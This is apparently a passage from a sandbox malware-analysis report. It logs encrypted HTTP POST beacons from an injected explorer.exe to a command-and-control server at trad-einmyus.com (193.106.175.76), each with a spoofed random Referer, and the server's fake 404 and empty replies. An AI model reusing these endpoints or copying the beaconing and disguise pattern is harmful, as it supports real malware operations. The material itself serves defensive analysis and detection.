Apr 4, 2024 17:49:09.815011024 CEST	205	OUT	Data Raw: 12 87 87 93 60 f8 a1 b4 ca 36 76 30 7d bd 91 8e 46 62 ae 33 a3 44 63 ef b9 9c dd 86 8e d0 9b f1 1c b0 5c a7 6a 1e cc 96 99 af f3 db c7 9c 11 66 68 f6 39 bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 90 66 5d 02 c8 a1 c1 64 13 bb ae 0a Data Ascii: `6v0}Fb3Dc\jfh9\Fu$f]dDzwN\|=N-Xt\!,y-sDU3~)M>/t-'OWwt $1+cu,eXe1,EQ ^&pDJ'b):
Apr 4, 2024 17:49:10.111654997 CEST	156	IN	HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Thu, 04 Apr 2024 15:49:09 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.10	49739	193.106.175.76	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 4, 2024 17:49:10.397980928 CEST	285	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qcnlqwjswwevflg.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 140 Host: trad-einmyus.com
Apr 4, 2024 17:49:10.398011923 CEST	140	OUT	Data Raw: 12 87 87 93 60 f8 a1 b4 ca 36 76 30 7d bd 91 8e 46 62 ae 33 a3 44 63 ef b9 9c dd 86 8e d0 9b f1 1c b0 5c a7 6a 1e cc 96 99 af f3 db c7 9c 11 66 68 f6 39 bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 91 66 5d 02 c8 a1 c1 64 02 8b 80 03 Data Ascii: `6v0}Fb3Dc\jfh9\Fu$f]d\@jzUT`s@*lDHGe'h`4b#]p+)GvVc
Apr 4, 2024 17:49:10.695703030 CEST	262	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.2 Date: Thu, 04 Apr 2024 15:49:10 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 34 66 0d 0a 04 00 ed 98 a4 08 a8 37 33 7c 09 c7 22 84 f6 82 af 73 32 f3 a2 68 33 54 27 c3 83 be 8e 99 1e a2 08 c9 63 a5 53 63 97 09 f8 ea 22 e5 38 69 15 b9 e0 9e 0f a2 17 c9 02 94 a7 7a d4 60 a6 bc 8d 14 3b 84 c3 3f 44 88 dd ca 0a 86 89 a2 0c bd 74 0d 0a 30 0d 0a 0d 0a Data Ascii: 4f73\|"s2h3T'cSc"8iz`;?Dt0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.10	49742	193.106.175.76	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 4, 2024 17:49:11.114042044 CEST	283	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ykjudvyllkuyg.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 367 Host: trad-einmyus.com
Apr 4, 2024 17:49:11.114075899 CEST	367	OUT	Data Raw: 12 87 87 93 60 f8 a1 b4 ca 36 76 30 7d bd 91 8e 46 62 ae 33 a3 44 63 ef b9 9c dd 86 8e d0 9b f1 1c b0 5c a7 6a 1e cc 96 99 af f3 db c7 9c 11 66 68 f6 39 bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 84 de 91 66 5d 02 c9 a1 c1 64 35 a0 b8 7a Data Ascii: `6v0}Fb3Dc\jfh9\Fu$f]d5zAsAR8.D{Irc$5?(vM%6. K0E(%JN4hZN~g;~*yAR0I1]XX+1B_h1zZD\!I'(M
Apr 4, 2024 17:49:11.407373905 CEST	597	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.2 Date: Thu, 04 Apr 2024 15:49:11 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.10	49743	193.106.175.76	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 4, 2024 17:49:11.855189085 CEST	282	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gyvrdnjxaaxg.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 321 Host: trad-einmyus.com
Apr 4, 2024 17:49:11.855217934 CEST	321	OUT	Data Raw: 12 87 87 93 60 f8 a1 b4 ca 36 76 30 7d bd 91 8e 46 62 ae 33 a3 44 63 ef b9 9c dd 86 8e d0 9b f1 1c b0 5c a7 6a 1e cc 96 99 af f3 db c7 9c 11 66 68 f6 39 bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 8e 66 5d 02 c8 a1 c1 64 07 96 c1 7c Data Ascii: `6v0}Fb3Dc\jfh9\Fu$f]d\|Lx{g)(g\at`f#4)fm!Ax;=&&8BL(&O ]n~999Mfd@Eg[#95x<g:.r&1r6c(J
Apr 4, 2024 17:49:12.158404112 CEST	156	IN	HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Thu, 04 Apr 2024 15:49:12 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.10	49745	193.106.175.76	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 4, 2024 17:49:12.942776918 CEST	284	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://regrmottymepxy.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 175 Host: trad-einmyus.com
Apr 4, 2024 17:49:12.942866087 CEST	175	OUT	Data Raw: 12 87 87 93 60 f8 a1 b4 ca 36 76 30 7d bd 91 8e 46 62 ae 33 a3 44 63 ef b9 9c dd 86 8e d0 9b f1 1c b0 5c a7 6a 1e cc 96 99 af f3 db c7 9c 11 66 68 f6 39 bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 8f 66 5d 02 c8 a1 c1 64 32 82 8b 15 Data Ascii: `6v0}Fb3Dc\jfh9\Fu$f]d22v#3W-[?G9l5w0,iES2mB*fPp]QYog.[1mU
Apr 4, 2024 17:49:13.232294083 CEST	597	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.2 Date: Thu, 04 Apr 2024 15:49:13 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.10	49746	193.106.175.76	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 4, 2024 17:49:13.567114115 CEST	283	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://moryykdrlgvjg.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 257 Host: trad-einmyus.com
Apr 4, 2024 17:49:13.567168951 CEST	257	OUT	Data Raw: 12 87 87 93 60 f8 a1 b4 ca 36 76 30 7d bd 91 8e 46 62 ae 33 a3 44 63 ef b9 9c dd 86 8e d0 9b f1 1c b0 5c a7 6a 1e cc 96 99 af f3 db c7 9c 11 66 68 f6 39 bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 8c 66 5d 02 c8 a1 c1 64 40 b7 ad 71 Data Ascii: `6v0}Fb3Dc\jfh9\Fu$f]d@q&K\|$FCCVT_zBt`U'#B9LxE'w8{v>O#3Qa,XlRCr'!z,dTSIRu=d3LBZWyZ2
Apr 4, 2024 17:49:13.859100103 CEST	156	IN	HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Thu, 04 Apr 2024 15:49:13 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.10	49748	193.106.175.76	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 4, 2024 17:49:14.163007975 CEST	282	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://sbihfurweaaj.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 177 Host: trad-einmyus.com
Apr 4, 2024 17:49:14.163031101 CEST	177	OUT	Data Raw: 12 87 87 93 60 f8 a1 b4 ca 36 76 30 7d bd 91 8e 46 62 ae 33 a3 44 63 ef b9 9c dd 86 8e d0 9b f1 1c b0 5c a7 6a 1e cc 96 99 af f3 db c7 9c 11 66 68 f6 39 bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 8d 66 5d 02 c8 a1 c1 64 53 b9 aa 09 Data Ascii: `6v0}Fb3Dc\jfh9\Fu$f]dS%JbpEU=dVn$}gvyFJ/!u'Ytp~dUb{Z*\|6(K7t
Apr 4, 2024 17:49:14.493093014 CEST	156	IN	HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Thu, 04 Apr 2024 15:49:14 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.10	49749	193.106.175.76	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 4, 2024 17:49:14.776251078 CEST	286	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://klogjhrpharyvvyr.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 225 Host: trad-einmyus.com
Apr 4, 2024 17:49:14.776269913 CEST	225	OUT	Data Raw: 12 87 87 93 60 f8 a1 b4 ca 36 76 30 7d bd 91 8e 46 62 ae 33 a3 44 63 ef b9 9c dd 86 8e d0 9b f1 1c b0 5c a7 6a 1e cc 96 99 af f3 db c7 9c 11 66 68 f6 39 bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 8a 66 5d 02 c8 a1 c1 64 14 ad 9b 1e Data Ascii: `6v0}Fb3Dc\jfh9\Fu$f]dakc_8Evms`\:RnwOAQ~kv+&'28R4Bsk7C[gc9^JImSFr&@>?`NMm-U,{
Apr 4, 2024 17:49:15.068805933 CEST	233	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.2 Date: Thu, 04 Apr 2024 15:49:14 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 33 32 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 89 43 14 78 1d e4 a3 8f ba a8 15 ea 1f d1 6f f8 62 7a b9 35 e3 e8 2d e9 3f 46 50 b9 e1 d9 0d 0a 30 0d 0a 0d 0a Data Ascii: 32I:82OCxobz5-?FP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.10	49752	193.106.175.76	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 4, 2024 17:49:16.288372993 CEST	284	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://cjivmprmunnfue.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 321 Host: trad-einmyus.com
Apr 4, 2024 17:49:16.288404942 CEST	321	OUT	Data Raw: 12 87 87 93 60 f8 a1 b4 ca 36 76 30 7d bd 91 8e 46 62 ae 33 a3 44 63 ef b9 9c dd 86 8e d0 9b f1 1c b0 5c a7 6a 1e cc 96 99 af f3 db c7 9c 11 66 68 f6 39 bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 8b 66 5d 02 c8 a1 c1 64 46 de d0 01 Data Ascii: `6v0}Fb3Dc\jfh9\Fu$f]dF@WmY9Gh =]-dXI"@dD%r\[,$cg72o_Q>f3?#tUH5PO!sJ-:4)L rh,Nz{#m\|V
Apr 4, 2024 17:49:16.582623005 CEST	597	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.2 Date: Thu, 04 Apr 2024 15:49:16 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.10	49755	193.106.175.76	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 4, 2024 17:49:16.877758026 CEST	286	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qtdootfwibyptmfp.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 263 Host: trad-einmyus.com
Apr 4, 2024 17:49:16.877758026 CEST	263	OUT	Data Raw: 12 87 87 93 60 f8 a1 b4 ca 36 76 30 7d bd 91 8e 46 62 ae 33 a3 44 63 ef b9 9c dd 86 8e d0 9b f1 1c b0 5c a7 6a 1e cc 96 99 af f3 db c7 9c 11 66 68 f6 39 bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 88 66 5d 02 c8 a1 c1 64 1d ba a4 6b Data Ascii: `6v0}Fb3Dc\jfh9\Fu$f]dk_&RJxF<UyElNz"7b+fS@a](iM%!eMO]lw"m+Vu]#~qM=\|0<+LL@W,yy@_.1TMV$F
Apr 4, 2024 17:49:17.175071955 CEST	597	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.2 Date: Thu, 04 Apr 2024 15:49:17 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.10	49757	193.106.175.76	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 4, 2024 17:49:17.487044096 CEST	281	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://klmmidnilgd.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 242 Host: trad-einmyus.com
Apr 4, 2024 17:49:17.487071991 CEST	242	OUT	Data Raw: 12 87 87 93 60 f8 a1 b4 ca 36 76 30 7d bd 91 8e 46 62 ae 33 a3 44 63 ef b9 9c dd 86 8e d0 9b f1 1c b0 5c a7 6a 1e cc 96 99 af f3 db c7 9c 11 66 68 f6 39 bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 89 66 5d 02 c8 a1 c1 64 0e d0 8d 7a Data Ascii: `6v0}Fb3Dc\jfh9\Fu$f]dzTHs~}9KfL%f\Wfan\|:=y!1r_LR]qC<XYr3.cXip_.Bam2cNSGXtj+e,fN,Q?#B[D
Apr 4, 2024 17:49:17.784018040 CEST	156	IN	HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Thu, 04 Apr 2024 15:49:17 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.10	49759	193.106.175.76	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 4, 2024 17:49:18.076502085 CEST	282	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rvqmjyfxgsww.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 191 Host: trad-einmyus.com
Apr 4, 2024 17:49:18.076524019 CEST	191	OUT	Data Raw: 12 87 87 93 60 f8 a1 b4 ca 36 76 30 7d bd 91 8e 46 62 ae 33 a3 44 63 ef b9 9c dd 86 8e d0 9b f1 1c b0 5c a7 6a 1e cc 96 99 af f3 db c7 9c 11 66 68 f6 39 bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 86 66 5d 02 c8 a1 c1 64 15 d7 d5 78 Data Ascii: `6v0}Fb3Dc\jfh9\Fu$f]dxIfx}!\X-3FupojoK2?8gP\|;u%oA7c^[KGn0LRv=fa\Kc
Apr 4, 2024 17:49:18.416944981 CEST	277	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.2 Date: Thu, 04 Apr 2024 15:49:18 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 35 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 83 54 0e 7d 17 be a1 83 bd ad 1d a1 52 dd 6d ba 19 59 9d 09 f4 a6 2d af 7b 64 0f a5 b4 89 18 c9 2d 84 1b 8f be 42 c3 5c 9a d3 f7 27 69 98 d0 4b 6b 80 a7 b4 0e 89 d3 cf 37 b2 33 ce 98 77 4d 1a 7d 4b 47 98 fc 64 a0 f2 5c 90 0d 0a 30 0d 0a 0d 0a Data Ascii: 5eI:82OT}RmY-{d-B\'iKk73wM}KGd\0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.10	49763	193.106.175.76	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 4, 2024 17:49:19.692835093 CEST	286	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://xlmtuhrwkmvmisey.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 173 Host: trad-einmyus.com
Apr 4, 2024 17:49:19.692835093 CEST	173	OUT	Data Raw: 12 87 87 93 60 f8 a1 b4 ca 36 76 30 7d bd 91 8e 46 62 ae 33 a3 44 63 ef b9 9c dd 86 8e d0 9b f1 1c b0 5c a7 6a 1e cc 96 99 af f3 db c7 9c 11 66 68 f6 39 bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 87 66 5d 02 c8 a1 c1 64 4c a0 b4 20 Data Ascii: `6v0}Fb3Dc\jfh9\Fu$f]dL N?X3ObsS\A2k{#o[lY1I4#:,x(<B. 5\L2KH*{
Apr 4, 2024 17:49:19.984498978 CEST	156	IN	HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Thu, 04 Apr 2024 15:49:19 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.10	49765	193.106.175.76	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 4, 2024 17:49:20.283170938 CEST	285	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://lmdwelfmosoqccq.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 362 Host: trad-einmyus.com
